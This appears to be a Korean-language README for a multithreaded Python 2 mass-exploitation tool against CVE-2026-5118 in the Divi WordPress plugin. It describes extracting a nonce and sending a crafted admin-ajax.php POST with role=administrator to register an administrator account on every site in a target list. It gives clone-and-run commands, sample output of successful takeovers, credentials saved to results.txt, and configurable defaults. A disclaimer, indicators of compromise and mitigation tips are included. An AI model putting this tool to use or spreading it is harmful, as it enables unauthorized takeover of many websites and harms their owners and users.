
CVE-2026-5118 – Divi WordPress 플러그인의 인증되지 않은 관리자 등록을 위한 Python2 대량 익스플로잇 (admin-ajax.php 경유). nonce 추출 기능이 있는 멀티스레드 스캐너.
⚠️ 경고: 이 도구는 공인된 침투 테스트 및 보안 연구용입니다.
승인되지 않은 컴퓨터 시스템 접근은 불법입니다. 소유권이 있거나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오. 추가 면책 조항: Jenderal92의 표지에서 면책 조항을 확인할 수 있습니다. 여기서 확인하세요 !!!
이 Python 2 스크립트는 Divi WordPress 플러그인(및 관련 Divi 양식)의 권한 상승 취약점을 악용합니다. 다음 방법을 통해 원격으로 관리자 계정을 등록할 수 있습니다:
fb_nonce 추출role=administrator와 함께 조작된 multipart 요청을 /wp-admin/admin-ajax.php로 전송https:// 추가de_fb_obj)success, user_id, user created 등) 기반results.txt 파일에 다음 형식으로 저장:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading 사용 – Python 3과 호환되지 않음)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
도메인 또는 URL을 한 줄에 하나씩 포함하는 텍스트 파일을 만듭니다. http:// / https://를 생략할 수 있으며, 스크립트가 기본적으로 https://를 추가합니다.
예시 targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] 전체 대상 수 : 4
[*] 자격 증명 : Attacker / Attacker@123#+
[*] 스레드 : 20
[*] 출력 파일 : results.txt
[1] 확인 중 https://example.com
[+] 성공! https://example.com/wp-admin/
[2] 확인 중 https://vulnerable-site.com
[+] 성공! https://vulnerable-site.com/wp-admin/
[3] 확인 중 http://192.168.1.100/wordpress
[3] 실패 http://192.168.1.100/wordpress
[4] 확인 중 https://test-site.org
[4] 실패 https://test-site.org
=== 완료 ===
성공: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
스크립트 상단에서 다음 변수를 사용자 지정할 수 있습니다:
https:// 추가fb_nonce 검색multipart/form-data POST 구성:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<추출된 nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailDivi를 사용하는 WordPress 관리자를 위한 조치:
admin-ajax.php 요청을 모니터링하세요.role 매개변수가 있는 등록 양식을 노출하지 마세요.침해 지표(IOC):
action=de_fb_ajax_submit_ajax_handler가 포함된 예상치 못한 admin-ajax.php 요청Attacker)을 가진 새로운 관리자 사용자role=administrator를 포함한 POST 데이터이 소프트웨어는 교육 목적 및 공인된 보안 테스트용으로만 제공됩니다. 작성자는 이 도구의 오용 또는 손해에 대해 어떠한 책임도 지지 않습니다. 이 소프트웨어를 사용함으로써 귀하는 다음 사항에 동의하는 것으로 간주됩니다:
이러한 조건을 위반할 경우 형사 기소, 벌금 또는 징역에 처해질 수 있습니다.
개선 사항(Python 3 포팅, 더 나은 nonce 추출, 추가 등록 경로 탐지)에 대한 풀 리퀘스트를 환영합니다. 윤리적 면책 조항을 유지해 주십시오.
| 변수 | 기본값 | 설명 |
|---|
DEFAULT_USERNAME | Attacker | 등록할 사용자 이름 |
DEFAULT_PASSWORD | Attacker@123#+ | 비밀번호 (특수 문자 포함 강력함) |
DEFAULT_EMAIL | [email protected] | 이메일 주소 |
THREAD_COUNT | 20 | 동시 스레드 수 |
OUTPUT_FILE | results.txt | 성공한 대상을 저장할 파일 |